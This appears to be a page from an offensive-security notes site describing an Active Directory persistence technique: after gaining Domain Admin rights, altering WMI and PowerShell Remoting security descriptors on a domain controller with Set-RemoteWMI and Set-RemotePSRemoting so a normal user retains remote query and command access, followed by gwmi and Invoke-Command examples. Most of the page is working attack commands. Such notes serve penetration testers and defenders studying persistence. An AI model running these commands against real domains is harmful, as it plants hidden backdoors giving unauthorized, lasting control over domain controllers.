MODIFYING SECURITY DESCRIPTORS

This is a Domain Persistence technique

MODIFYING SECURITY DESCRIPTORS FOR WMI-REMOTING

Needs Domain Admin privileges to modify the Security Descriptors

The default WMI namespace is Root/CIMV2

Set-RemoteWMI -UserName <USERNAME> -ComputerName <DC FQDN> -namespace 'root\cimv2'

Specified user will be added to the Root/CIMV2 namespace of the Domain Controller

To get list of all WMI classes

Get-WmiObject -list

gwmi -list

Executing WMI queries on Domain Controller (HOST + RPCSS = WMI)

 //get list of all user accounts in DC
 gwmi -class win32_account -ComputerName <DC FQDN>
 
 //get operating system info
  gwmi -class win32_operatingsystem -ComputerName <DC FQDN>

It can be used for persistence, to access WMI queries and It doesn't need special privileges anymore for the normal user to query it

MODIFYING SECURITY DESCRIPTORS FOR PS-REMOTING

Needs Domain Admin privileges to modify the Security Descriptors

Set-RemotePSRemoting –UserName <USERNAME> -ComputerName <DC FQDN>

(Ignore the "I/O Operation Error", In some case it might show)

Requires Logoff and Logon for the specific user to implement this change

Specified user will be granted privilege for PowerShell Remoting for Domain Controller

 Invoke-Command -ComputerName <DC FQDN> -ScriptBlock {whoami;hostname}

It can be used for persistence, to pass commands through PS-Remoting and It doesn't need special privileges anymore for the normal user

PreviousAD PERSISTENCENextREMOTE REGISTRY BACKDOOR

Last updated